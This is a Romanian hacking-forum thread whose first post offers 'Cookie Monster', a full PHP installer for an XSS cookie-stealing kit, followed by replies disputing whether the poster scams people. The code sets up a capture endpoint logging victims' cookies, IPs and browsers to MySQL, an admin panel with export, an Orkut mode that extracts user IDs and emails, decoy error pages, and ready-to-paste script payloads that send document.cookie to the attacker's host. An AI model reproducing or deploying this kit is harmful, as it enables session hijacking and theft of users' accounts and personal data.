koruno.php Posted August 8, 2013 Report Share Posted August 8, 2013 Cookie Monster este un script PHP care va ajut? s? fura?i cookieuri/sesiuni cu ajutorul vulnerabilit??ilor de tip XSS. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><script language="JavaScript" type="text/javascript"><!--function ValidaTodos(){var campo = document.forms[0];var i=0;for (i=0; i<campo.elements.length; i++){var valida = campo.elements[i].value;if (valida == ''){alert('Fill all Fields');return false;}}}//--></script> <title>Cookie Monster v1.0a Installer</title><style type="text/css">table.bordasimples {border-collapse: collapse;}table.bordasimples tr td {border:1px solid #000000;background-color:#ffffff;pading:6;}fieldset {display: inline;-moz-border-radius: 6px;padding: 9px;}legend{color: #fff;background: #000000;border: 2px solid #880000;padding: 2px 6px;}body { color: #333333; font-size: small; font-family: Verdana, Arial; background-color: #dbdbdb;}textarea { background-color: #880000;font-family: Verdana, Arial; color:#ffffff;font-size: 10px;overflow: auto;overflow-y: hiden;overflow-x: hiden;width:785px;white-space: pre; }a {color: #dd0000;text-decoration:none;}a:visited {color: #880000;}a:hover {color: #000000;}</style></head><html><body><?php//Capturador$criaacc ='<?php require("config.php"); $cookie = htmlspecialchars($_GET[\'cookie\'], ENT_QUOTES); $IP = htmlspecialchars($_SERVER[\'REMOTE_ADDR\'], ENT_QUOTES); $navegador = htmlspecialchars($_SERVER[\'HTTP_USER_AGENT\'], ENT_QUOTES); $host = "".$IP." - ".gethostbyaddr($_SERVER[\'REMOTE_ADDR\']).""; $data = date ("j/m/Y - H:i:s");function finaliza($saida,$tipo){if($saida == \'silent\'){ exit(); }if($saida == \'error\'){if($tipo == \'orkut\'){echo "<script>window.location = \'http://www.orkut.com/Home.asp\';</script>";exit();}else{ echo "<title>404 Error - File Not Found</title><body><h1>404 Error - File Not Foud</h1>The file you were trying to open cannot be found. The file may have been damaged, moved, deleted, or a bug causes it</b>"; exit();}}if($saida == \'loop\'){echo "<script>for (i = 0; i <= 100000000; i++){alert(\'Erro: Access violation at address 0723304E Read of address 00000010\')}</script>";exit();}} function conecta($fservidor,$fuser,$fsenha,$fdb){ mysql_connect("$fservidor", "$fuser", "$fsenha") or die(mysql_error()); mysql_select_db("$fdb") or die(mysql_error()); }function captura($ftbl,$fdata,$fip,$fnavegador,$fcookie,$fblock,$fuserid,$femail,$fextra){ mysql_query("INSERT INTO $ftbl (data,ip,navegador,cookie,block,userid,email,extra,referer) VALUES(\'$fdata\',\'$fip\',\'$fnavegador\',\'$fcookie\',\'$fblock\',\'$fuserid\',\'$femail\',\'$fextra\', \'$_SERVER[HTTP_REFERER]\') ") or die(mysql_error()); finaliza($saida,$tipo); }//Captura em Orkut Modeif ($tipo == \'orkut\'){ if(empty($cookie) || strlen($cookie) < 200 ){ finaliza($saida,$tipo);} else{ preg_match(\'/ID=(\d+)/\', $cookie, $uid); preg_match(\'/USR=[A-Za-z0-9=\/\+]+/\', $cookie, $email); $emailbs64 = substr($email[0], 4); $emaildec = base64_decode($emailbs64); if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$", $emaildec)) { $emaildec = "nulo"; } preg_match(\'/ORKUTPREF=[A-Za-z0-9=\/\+\:\_\- +]+/\', $cookie, $pref); if(empty($pref[0])){ finaliza($saida,$tipo); } conecta($servidor,$user,$senha,$db);$QUERY = "SELECT `block` FROM `$tbl` WHERE `block`=\'$uid[1]\'";$RESULT = mysql_query($QUERY) or die(mysql_error()); if(mysql_num_rows($RESULT) >= 1) { finaliza($saida,$tipo); }captura($tbl,$data,$host,$navegador,$pref[0],$uid[1],$uid[1],$emaildec,NULL);finaliza($saida,$tipo); }}//Captura no Modo Defaultif($tipo == \'outros\'){ if(empty($cookie)){ finaliza($saida,$tipo);} else{conecta($servidor,$user,$senha,$db);$QUERY = "SELECT `block` FROM `$tbl` WHERE `block`=\'$IP\'";$RESULT = mysql_query($QUERY) or die(mysql_error()); if(mysql_num_rows($RESULT) >= 1) { finaliza($saida,$tipo); }captura($tbl,$data,$host,$navegador,$cookie,$IP,NULL,NULL,NULL);finaliza($saida,$tipo); }}?>';//Log Monster$crialog ='<?phprequire("config.php");$ver="1.0b";$auth = $_POST[\'password\'];//Logoutif($_GET[\'logout\'] == \'sair\'){if($domain == \'.localhost\'){setcookie(\'login\', \'\', time()-60000, \'/\');} setcookie(\'login\', \'\', time()-60000, \'/\', $domain);echo "<script language=javascript>alert(\'Hasta la vista baby!\');</script>";echo "<script>document.location=\'{$_SERVER[\'PHP_SELF\']}?nc=".md5(rand(1000000000,99999999999))."\';</script>";}//Loginif(md5($auth) == "$admin"){if($domain == \'.localhost\'){setcookie(\'login\', $admin, time()+86400, \'/\');} setcookie(\'login\', $admin, time()+86400, \'/\', $domain);echo "<script language=\'javascript\'>alert(\'Welcome to Cookie Monster!\');</script>";echo "<script>document.location=\'{$_SERVER[\'PHP_SELF\']}?nc=".md5(rand(1000000000,99999999999))."\';</script>";}//Head Orkut Modeif($tipo == "orkut"){ echo \'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>Cookie Monster v\'.$ver.\' - Running in Orkut Mode - by X9</title><style type="text/css">.tbanner{background-color:#bfd0ea;}.ttabela{background-color:#e5ecf4;}table.bordasimples {border-collapse: collapse;}table.bordasimples tr td {border:1px solid #a1bbe4;}legend{color: #000000;background: #e5ecf4;border: 1px solid #a1bbe4;padding: 2px 6px;}fieldset {display: inline;-moz-border-radius: 7px;padding:10px;}body { color: #000000; font-size: 12px; font-family: Verdana, Geneva, Arial, sans-serif; background-color: #D4DDED;}textarea { background-color: #e8eae8; font-family: Verdana, Arial, sans-serif;color:#5d665b;font-size: 12px;overflow: auto;overflow-y: auto;overflow-x: auto;width:730px;white-space:nowrap; }a:link{color: #0047be;text-decoration: underline;}a:hover {color: #c40098;text-decoration: underline;}</style></head><html><body>\';}//Head Modo Padrãoif($tipo == "outros"){echo \'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>Cookie Monster v\'.$ver.\' Running in default mode</title><style type="text/css">table.bordasimples {border-collapse: collapse;}table.bordasimples tr td {border:1px solid #000000;background-color:#ffffff;pading:6;}fieldset {display: inline;-moz-border-radius: 6px;padding: 9px;}legend{color: #fff;background: #000000;border: 2px solid #880000;padding: 2px 6px;}body { color: #333333; font-size: small; font-family: Verdana, Arial; background-color: #dbdbdb;}textarea { background-color: #880000;font-family: Verdana, Arial; color:#ffffff;font-size: 12px;overflow: auto;overflow-y: hiden;overflow-x: hiden;width:730px;white-space: nowrap; }a {color: #dd0000;text-decoration:none;}a:visited {color: #880000;}a:hover {color: #000000;}</style></head><html><body>\'; }//Load Time$time = microtime();$time = explode(\' \', $time);$time = $time[1] + $time[0];$start = $time;if($_COOKIE[\'login\'] == $admin){//Layout Mudar Senhaif($_GET[\'mudar\'] == \'senha\'){ echo "<center><table width=40% border=1 bgcolor=#c9d6eb class=bordasimples cellpadding=5 cellspacing=0>"; echo "<br/><br/><tr><td align=center colspan=2><b>Change Your Password<img src=http://img512.imageshack.us/img512/2127/cadeadovx5.gif></b></td></tr>"; echo "<tr><td align=center colspan=2>"; echo "<form method=\"post\" action=\"logmonster.php\">"; echo "<br/><b>New Password: </b>"; echo "<input name=password type=password id=password /> "; echo "<input type=submit name=Submit value=Submit /><br/><br/>"; echo "<input name=\"Dominio\" type=\"hidden\" value=\"$domain\" />"; echo "<input name=\"Banco_de_Dados\" type=\"hidden\" value=\"$db\" />"; echo "<input name=\"Servidor\" type=\"hidden\" value=\"$servidor\" />"; echo "<input name=\"Tabela\" type=\"hidden\" value=\"$tbl\" />"; echo "<input name=\"Senha\" type=\"hidden\" value=\"$senha\" />"; echo "<input name=\"Usuario\" type=\"hidden\" value=\"$user\" />"; echo "<input name=\"ctipo\" type=\"hidden\" value=\"$tipo\" />"; echo "<input name=\"csaida\" type=\"hidden\" value=\"$saida\" />"; echo "<input name=\"mudar\" type=\"hidden\" value=\"ok\" />"; echo "</form>"; echo "</td></tr></table></center>"; exit();} //Mudando a Senha if($_POST[\'mudar\'] == \'ok\'){$cdomain = $_POST["Dominio"];$cdb = $_POST["Banco_de_Dados"];$cservidor = $_POST["Servidor"];$ctbl = $_POST["Tabela"];$cadmin = $_POST["password"];$csenha = $_POST["Senha"];$cuser = $_POST["Usuario"];$ctipo = $_POST["ctipo"];$csaida = $_POST["csaida"]; $mdadmin= md5("$cadmin");$criaconfig ="<?php\n\$domain = \'$cdomain\';\n\$db = \'$cdb\';\n\$servidor = \'$cservidor\';\n\$tbl = \'$ctbl\';\n\$admin = \'$mdadmin\';\n\$senha = \'$csenha\';\n\$user = \'$cuser\';\n\$tipo = \'$ctipo\';\n\$saida = \'$csaida\';\n?>"; $fh = @fopen(\'config.php\', \'w\') or die(myErro("Error At Changing Your Password"));@fwrite($fh, $criaconfig);@fclose($fh);@chmod(\'config.php\', 0755) or die(myErro("Error At trying make CHMOD 0755 Permission on <b>config.php</b>Try Make it Manually by FTP or Files Manager"));echo "<script>alert(\'Password has been changed, Use the new password to log in\')</script>";echo "<script>document.location=\'{$_SERVER[\'PHP_SELF\']}?nc=".md5(rand(1000000000,99999999999))."\';</script>";} mysql_connect("$servidor", "$user", "$senha") or die(mysql_error()); mysql_select_db("$db") or die(mysql_error());//Strings da Páginação$did = $_GET[\'did\'];$pagina = $_GET[\'pagina\'];$pag_views =10;If (!$pagina){$pagina = 1;} else{$pagina = $pagina;}$mat = $pagina -1;$inicio = $mat * $pag_views; //Delete by IDif($_GET[\'cmd\']==delete){ $del = "DELETE FROM `$tbl` WHERE `ID`=\'$did\' LIMIT 1"; mysql_query($del); $opt = "OPTIMIZE TABLE $tbl"; echo "<script>alert(\'LOG $did DELETED SUCCESSFULLY\')</script>"; $referrer = $_SERVER[\'HTTP_REFERER\']; echo "<script>document.location=\'$referrer\';</script>"; mysql_query($opt);}//Função Exportarif($_GET[\'exportar\'] == 1){$exportc =0;$myFile = "".$tbl."_cookie_export.txt";$fh = fopen($myFile, \'w\') or die(\'Erro ao Abrir o Arquivo\');$fh2 = fopen($myFile, \'a\') or die(\'Erro ao Abrir o Arquivo\');$export = mysql_query("SELECT * FROM $tbl ") or die(mysql_error()); while($row = mysql_fetch_array( $export )) {$stringData = "".$row[cookie]."\n\n";fwrite($fh2, $stringData);$exportc++;}fclose($fh2);@chmod($myFile, 0755) or die();echo "<center><table class=bordasimples cellpadding=5 cellspacing=0 width=810px> <tr bgcolor=#c9d6eb><td class=bordasimples>".$exportc." Cookies Exported (<a href=\'".$myFile."\' target=_blank>Click Here to Download</a>)<br/> </td></tr> </table><br/> </center> ";} echo "<table width=\"800px\" border=\"1\" align=\"center\" class=\"bordasimples\" cellpadding=\"5\" cellspacing=\"0\">\n"; echo "<tr class=\"tbanner\"><td colspan=\"2\" align=\"center\" valign=\"top\"><img src=\"http://img365.imageshack.us/img365/8091/cookimonstercy4.jpg\" border=\"0\" align=\"top\"/></td></tr>\n"; echo "<tr class=\"ttabela\"><td align=\"left\" colspan=\"2\"><b>Cookie List</b> - <a href=\"?logout=sair\">Logout</a> | <a href=\"?mudar=senha\">Change Password</a> | <a href=\"?exportar=1\">Export Cookies to TXT</a> | <a href=\"javascript:void(0)\" onclick=\"window.open(\'http://dicasetruques.110mb.com/cversion/checkversioni.php?checkversion=".$ver."\',\'Atualização\',\'width=400,height=200\')\">Update Check</a></td></tr>\n"; $sql = "SELECT * FROM $tbl"; $query = mysql_query($sql); $limita = "$sql order by ID LIMIT $inicio,$pag_views"; $executa = mysql_query($limita); $linhas = mysql_num_rows($query); $paginas = $linhas / $pag_views; $volta = $pagina -1; $proxima = $pagina +1; $cor=\'um\'; while($row = mysql_fetch_array( $executa )){ //Cor Sim Cornudo Cornão Orkut if($tipo == \'orkut\'){ if($cor == \'um\'){ echo "<tr bgcolor=\"#c9d6eb\"><td width=\"5%\"><center>"; echo $row[ID]; echo "<br/>\n"; echo "<a href=\"?cmd=delete&did=".$row[ID]."\">[X]</a></center>"; echo "</td><td width=\"95%\">"; echo "<a href=\"http://www.orkut.com/Profile.aspx?uid=".$row[userid]."\" target=\"_blank\"><img src=\"http://img244.imageshack.us/img244/204/userwa2.gif\" border=\"0\" alt=\"Perfil\"/></a> <a href=\"mailto:".$row[email]."\"><img src=\"http://img152.imageshack.us/img152/7995/emailgi9.gif\" border=\"0\" alt=\"E-mail\"/></a><br/><br/><fieldset><legend><b>Date</b></legend> ".$row[data]."</fieldset> <fieldset><legend><b>IP</b></legend>".$row[ip]."</fieldset><br /><br /><fieldset><legend><b>Referer</b></legend>".$row[referer]."</fieldset><br/><br/><fieldset><legend><b>Browser</b></legend>".$row[navegador]."</fieldset><br/><br/><fieldset><legend><b>Cookies</b></legend><textarea rows=\"4\" readonly >".$row[cookie]."</textarea></fieldset>\n"; echo "</td>"; echo "</tr>"; $cor=\'dois\'; } else{ echo "<tr bgcolor=\"#bfd0ea\"><td width=\"5%\"><center>"; echo $row[ID]; echo "<br/>"; echo "<a href=\"?cmd=delete&did=".$row[ID]."\">[X]</a></center>"; echo "</td><td width=\"95%\">"; echo "<a href=\"http://www.orkut.com/Profile.aspx?uid=".$row[userid]."\" target=\"_blank\"><img src=\"http://img244.imageshack.us/img244/204/userwa2.gif\" border=\"0\" alt=\"Perfil\"/></a> <a href=\"mailto:".$row[email]."\"><img src=\"http://img152.imageshack.us/img152/7995/emailgi9.gif\" border=\"0\" alt=\"E-mail\"/></a><br/><br/><fieldset><legend><b>Date</b></legend> ".$row[data]."</fieldset> <fieldset><legend><b>IP</b></legend>".$row[ip]."</fieldset><br/><br/><fieldset><legend><b>Referer</b></legend>".$row[referer]."</fieldset><br /><br /><fieldset><legend><b>Browser</b></legend>".$row[navegador]."</fieldset><br/><br/><fieldset><legend><b>Cookies</b></legend><textarea rows=4 readonly>".$row[cookie]."</textarea></fieldset>\n"; echo "</td>"; echo "</tr>"; $cor=\'um\'; } } if($tipo == \'outros\'){ //Print lista Normal echo "<tr><td width=\"5%\"><center>"; echo $row[ID]; echo "<br/>"; echo "<a href=\"?cmd=delete&did=".$row[ID]."\">[X]</a></center>"; echo "</td><td width=\"95%\">"; echo "<fieldset><legend><b>Data</b></legend>".$row[data]."</fieldset><fieldset><legend><b>IP</b></legend>".$row[ip]."</fieldset><br/><br/><fieldset><legend><b>Referer</b></legend>".$row[referer]."</fieldset><br /><br /><fieldset><legend><b>Browser</b></legend>".$row[navegador]."</fieldset><br/><br/><fieldset><legend><b>Cookies</b></legend><textarea rows=4 readonly >".$row[cookie]."</textarea></fieldset>"; echo "</td>"; echo "</tr>"; } } //Row de Páginação echo "<tr class=\"ttabela\"><td colspan=\"2\">"; //Exibe Paginação If ($volta>0) echo "<a href=\"?pagina=".$volta."\">Previous</a>"; For ($i = 0; $i <= $paginas; $i++){ $pag = $i +1; $did = $row[\'ID\']; echo " <a href=\"?pagina=".$pag."\">".$pag."</a>"; }If ($pagina<$paginas){echo " <a href=\"?pagina=".$proxima."\">Next</a> ";}//Fecha html tableecho "</td></tr></table><br/><p align=\"center\">Cookie Monster ".$ver." by X9<br><i>English Translation by Hugo</i></p>";//Calcula Load Time$time = microtime();$time = explode(\' \', $time);$time = $time[1] + $time[0];$finish = $time;$total_time = round(($finish - $start), 4);//Exibe Load Timeecho \'<p align="center"><i>Page loaded in \'.$total_time.\' seconds</i></p>\';}else{if(!empty($_POST[\'password\'])){echo "<script language=\'javascript\'>alert(\'Wrong Password, Try Again!\');</script>"; } echo "<table align=\"center\" width=\"40%\" bgcolor=\"#c9d6eb\" border=\"1\" class=\"bordasimples\" cellpadding=\"5\" cellspacing=\"0\">\n"; echo "<br/><br/><tr><td align=\"center\" colspan=\"2\"><b>Admin Area <img src=\"http://img512.imageshack.us/img512/2127/cadeadovx5.gif\"/></b></td></tr>\n"; echo "<tr><td align=\"center\" colspan=\"2\">"; echo "<form method=\"post\" action=\"logmonster.php\">\n"; echo "<br/><b>Password: </b>\n"; echo "<input name=\"password\" type=\"password\" id=\"password\"/>\n"; echo "<input type=\"submit\" name=\"Submit\" value=\"Login\" /><br/><br/>\n"; echo "</form>"; echo "</td></tr></table>\n";}?></body></html>';//Function Dirfunction my_dir(){$me = $_SERVER['PHP_SELF'];$Apathweb = explode("/", $me);$myFileName = array_pop($Apathweb);$pathweb = implode("/", $Apathweb);$myURL = "http://".$_SERVER['HTTP_HOST'].$pathweb."/";$PAGE_BASE['www'] = $myURL;$www = $PAGE_BASE['www'];return $www;}//MSG de Errofunction myErro($msgerro){ echo "<center><table width=799px border=1 bgcolor=#c9d6eb class=bordasimples cellpadding=5 cellspacing=0><tr><td align=left colspan=2><b><img src=http://img217.imageshack.us/img217/5850/alertnq1.gif border=0 align=center>Config Error</b><br><br>". $msgerro . "<br><br><a href=javascript:history.back()><< Back</a></td></tr></table></center><br>";}//MSG de Sucessofunction myOk($msg){ echo "<center><table width=799px border=1 bgcolor=#c9d6eb class=bordasimples cellpadding=5 cellspacing=0><tr><td align=left colspan=2><img src=http://img524.imageshack.us/img524/8066/tksvinfogreenyh6.gif border=0 align=center> ". $msg . "<br></td></tr></table></center><br>";}//Cria Arquivosfunction myCria($myFile,$stringData){$fh = @fopen($myFile, 'w') or die(myErro("Error at Create file <b>".$myFile."</b>"));myOk("File <b><a href=".my_dir()."".$myFile." target=_blank>".$myFile."</a></b> Created Successfully");@fwrite($fh, $stringData);@fclose($fh);@chmod($myFile, 0755) or die(myErro("Fail at trying make CHMOD 0755 Permission on File<b> ".$myFile." </b>Make it Manually by FTP or Files Manager"));} $cdomain = $_POST["Dominio"];$cdb = $_POST["Banco_de_Dados"];$cservidor = $_POST["Servidor"];$ctbl = $_POST["Tabela"];$cadmin = $_POST["Senha_do_Admin"];$csenha = $_POST["Senha"];$cuser = $_POST["Usuario"];$ctipo = $_POST["ctipo"];$cblock = $_POST["Cookie_de_Bloqueio"];$csaida = $_POST["csaida"];//Setupif($_GET["setup"] == on){echo"<div align=\"center\"><form action=\"{$_SERVER['PHP_SELF']}\"; onsubmit=\"return ValidaTodos();\" method=\"post\" enctype=\"multipart/form-data\" name=\"form1\" id=\"form1\"> <table width=\"799\" border=\"1\" align=\"center\" cellpadding=\"5\" cellspacing=\"0\" class=\"bordasimples\"> <tr> <td colspan=\"2\" align=\"left\" valign=\"top\"><strong><img src=\"http://img365.imageshack.us/img365/8091/cookimonstercy4.jpg\" width=\"799\" height=\"82\" align=\"top\" /></strong></td> </tr> <tr> <td width=\"378\" height=\"398\" align=\"left\" valign=\"top\"><p><strong>MySQL Config</strong></p> <p><strong>Database<br /> </strong> <input name=\"Banco_de_Dados\" type=\"text\" id=\"Banco_de_Dados\" /> <br /> <span class=\"style1\">Database Name</span><strong><br /></strong><br /><strong>Password <br /> </strong> <input name=\"Senha\" type=\"password\" id=\"Senha\" /> <br /> <span class=\"style1\">Database Password</span> <br /> <br /> <strong>User<br /> </strong> <input name=\"Usuario\" type=\"text\" id=\"Usuario\" /> <br /> <span class=\"style1\">Database User</span> </p> <p><strong>Table<br /> </strong> <input name=\"Tabela\" type=\"text\" id=\"Tabela\" /> <br /> <span class=\"style1\">Table That Will be Created to Store Cookies</span></p> <p> <label><strong>Server<br /> </strong> <input name=\"Servidor\" type=\"text\" id=\"Servidor\" /> <br /> <span class=\"style1\">MySQL Host Location<br /> e.g. localhost</span></label></p></td> <td width=\"395\" align=\"left\" valign=\"top\"><p><strong>Cookie Monster Options</strong></p> <p><strong>Admin Password<br /> </strong> <input name=\"Senha_do_Admin\" type=\"password\" id=\"Senha_do_Admin\" size=\"8\" /> <br /> <span class=\"style1\">Type the Password You Want to Use</span></p> <p><strong>Domain</strong><br /> <input name=\"Dominio\" type=\"text\" id=\"Dominio\" value=\".{$_SERVER['HTTP_HOST']}\";/> <br /> <span class=\"style1\">Domain Addres of Your Website e.g. .sub.domain.com (<em>This is Used to Create the Login Cookie)</em></span><br /> <br /> <p><strong>Capture Mode</strong> <label> <select name=\"ctipo\" id=\"ctipo\"> <option value=\"orkut\">Orkut</option> <option value=\"outros\" selected=\"selected\">Others Websites(default)</option> </select> </label></p> <p><b>End Action</b> <select name=\"csaida\" id=\"csaida\"> <option value=\"silent\">Silent</option> <option value=\"error\">With Error Page</option> <option value=\"loop\">Loop Alert</option> </select> <br /> <br /> <br /> <input type=\"submit\" name=\"Submit\" value=\"Submit\" /> <input name=\"configurar\" type=\"hidden\" id=\"configurar\" value=\"Sim\" /> </p> </td> </tr> </table> <strong>*You Must Fill All the Fields*</strong> <br /> </form></div></body></html>";exit();}//Configuraçãoif($_POST["configurar"] == Sim){echo "<center><img src=http://img508.imageshack.us/img508/6835/cookimonsterrs0.jpg><table width=799px border=1 bgcolor=#c9d6eb class=bordasimples cellpadding=5 cellspacing=0><tr><td align=left colspan=2>Cookie Monster Instalation</td></tr></table></center><br><center><b>";//Conexão MySQL @mysql_connect("$cservidor", "$cuser", "$csenha") or die(myErro("Error at connect to database, Make Sure if <b>Server, User and Database Password</b> are Correct"));@mysql_select_db("$cdb") or die(myErro("Error at Selecting Database <b>". $cdb. "</b> Make Sure if <b>Server, User and Database Password</b> Are Correct"));myOk("Successfully Connected To the Database<b> " . $cdb . " </b>");//Tenta Cria Tabela@mysql_query("CREATE TABLE `$ctbl`( `ID` INT NOT NULL AUTO_INCREMENT, `data` TEXT NOT NULL, `userid` TEXT NULL, `email` TEXT NULL, `ip` TEXT NOT NULL, `navegador` TEXT NOT NULL, `cookie` TEXT NOT NULL, `referer` TEXT NOT NULL, `block` TEXT NOT NULL, `extra` TEXT NULL, PRIMARY KEY (`ID`))TYPE = myisam;") or die(myErro("Error At Creating Table <b> " . $ctbl . " </b> Make Sure if <b>Server, User and Database Password</b> are Correct.<br><br><i>This Error can Occurrs if the Table <b> ".$ctbl." </b> is Already There. Then Choose A new Table Name</i>")); myOk("MySQL Table <b> ". $ctbl ." </b> Created Successfully!");@mysql_query("INSERT INTO `$ctbl`(data,userid,email,ip,navegador,cookie,referer,block,extra) VALUES('03/10/2025 - 10:55:00','11366245690762217423','x9moderador@hotmail.com','192.168.254.1 - 1921682541-veloxzone.com.br','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4,gzip(gfe)','ORKUTPREF=ID=11366245690762217423:INF=0:SET=116653396:LNG=79:CNT=29:RM=0:USR=eGl6bmluZUBnbWFpbC5jb20=:PHS=:TS=1178070210:LCL=pt-BR:NET=3:TOS=2147483647:GC=DQAAAHAAAADmJma1mk7tbQLo3aMz8yEMRLvnjIKjGbs9LcoQPExv-jD0iqMWvrkKihcXgTrji0NV40xhslN2T-4mK6NewcDlz9VsPfCLfCQyflri5-stxH3eClHHs7iKSWHjuvE9-jGuSvze356pgEQiQ-vbvRah:PE=eGl6bmluZUBnbWFpbC5jb20=:GTI=0:GID=:VER=2:S=NVgTxYHnhbRMiVsg58C4I9mrPMk=:', 'thiswebsite.com', '11366245690762217423','')")or die(mysql_error());$mdadmin= md5("$cadmin");//Config.php$criaconfig ="<?php\n\$domain = '$cdomain';\n\$db = '$cdb';\n\$servidor = '$cservidor';\n\$tbl = '$ctbl';\n\$admin = '$mdadmin';\n\$senha = '$csenha';\n\$user = '$cuser';\n\$tipo = '$ctipo';\n\$saida = '$csaida';\n?>";//Script JS1$js1 = "new Image().src='".my_dir()."getmonster.php?cookie='+encodeURIComponent(document.cookie);";//Script JS2$js2 = "document.location='".my_dir()."getmonster.php?cookie='+encodeURIComponent(document.cookie);";//Criando Arquivos do Cookie Monster//ConfigmyCria('config.php',$criaconfig); //CapturadormyCria('getmonster.php',$criaacc);//LogmyCria('logmonster.php',$crialog);//cm.js 1myCria('cm.js',$js1);//cm2.jsmyCria('cm2.js',$js2);$cex = "\n";myCria(''.$ctbl.'_cookie_export.txt',$cex);//Instalação concluidamyOk("Congratulations <b>Cookie Monster v1.0b</b> Was Installed Succesfully!");echo "<b>Basic Codes</b><Br>";echo "<textarea cols=122 rows=10>\n1st\n<script src='".my_dir()."cm.js'</script>\n\n";echo "2nd\n<script src='".my_dir()."cm2.js'</script>\n\n";echo "3rd\n<script>new Image().src='".my_dir()."getmonster.php?cookie='+encodeURIComponent(document.cookie);</script>\n\n";echo "4th\n<script>document.location='".my_dir()."getmonster.php?cookie='+encodeURIComponent(document.cookie);</script>\n\n *** It is Not Recommended Use the Fourth One ***</textarea>";echo "<br><i><b>For Your Security delete install.php from your host</b></i><br></center>";exit();}$etapas='termos';if($etapas == 'termos'){//Layout Termosecho "<center><img src=http://img508.imageshack.us/img508/6835/cookimonsterrs0.jpg><table width=799px border=1 bgcolor=#c9d6eb class=bordasimples cellpadding=5 cellspacing=0><tr><td align=left colspan=2>Use Terms </td></tr></table></center><br><center><b>"; echo "<center><table width=799px border=1 class=bordasimples cellpadding=5 cellspacing=0><tr> <td colspan=2 align=left valign=\"top\"><p><b>Use Terms</b><br /> <label> <div align=\"center\"> <textarea name=\"textarea\" rows=\"20\">Before Install Cookie Monster, Read Through This. The user of This IP: {$_SERVER['REMOTE_ADDR']} declare readed it, understood it and accept all the Terms And Conditions Below.1 - CopyrightCookies Monster's Source is owned by your developer and is protected on general terms of Copyright.The Use of this is allowed for Personal Use, is NOT allowed modifications, copys, borrow, rent, or anyway to get money.2 – Use and RisksAll the results of Using Cookie Monster is your Resposability, who is in risk is YOU, not us. Even the developer or anyone who is involved in this creation.</textarea><br><a href=?setup=on>I Want Install Cookie Monster</a> | <a href=http://www.dicasetruques.110mb.com>I Disagree</a><br /><br /> </div> </label> </td></tr></table></center>";}?> Quote Link to comment Share on other sites More sharing options...
xplonde Posted August 8, 2013 Report Share Posted August 8, 2013 Aveti grija cu ce luati de la acest individ, care se ocupa cu dat tepe oamenilor de pe rst. Quote Link to comment Share on other sites More sharing options...
h05th Posted August 11, 2013 Report Share Posted August 11, 2013 xplonde , numai ratati primesc tzepe de la ratati , cei tzepuiti sunt mai ratati decat ratatii ce dau tzeapa ! Doar nu esti tu atat de prost , in cat sa nu citesti liniile de cod din acest tool !Daca ai luat tzeapa de la cineva , nu trebuie sa injuri si sa urli in gura mare ! Tu nu trebuie sa spui nimanui , ca tu te faci de cacat , nu el ! Te ia lumea de fraier , si iti vei lua mai multe tzepe ! Quote Link to comment Share on other sites More sharing options...
babyface Posted August 12, 2013 Report Share Posted August 12, 2013 @h05th, 1 la mana, omu' nu a injurat pe nimeni, iar 2 la mana, nu vad de ce trebuie sa il faci prost atata timp cat el ne face atenti la magariile unuia, din cate vad, tu ejti ala care injura si urla cat il tin bosogii, chill man... Quote Link to comment Share on other sites More sharing options...
koruno.php Posted August 12, 2013 Author Report Share Posted August 12, 2013 xplonde: B?i, deci e?ti psihotic. Haide, am dat ?eap?, arat? te rog frumos dovezile ?i plec eu singur. Dac? nu ai aceste dovezi, nu te mai bag? în toate topicurile mele. Quote Link to comment Share on other sites More sharing options...
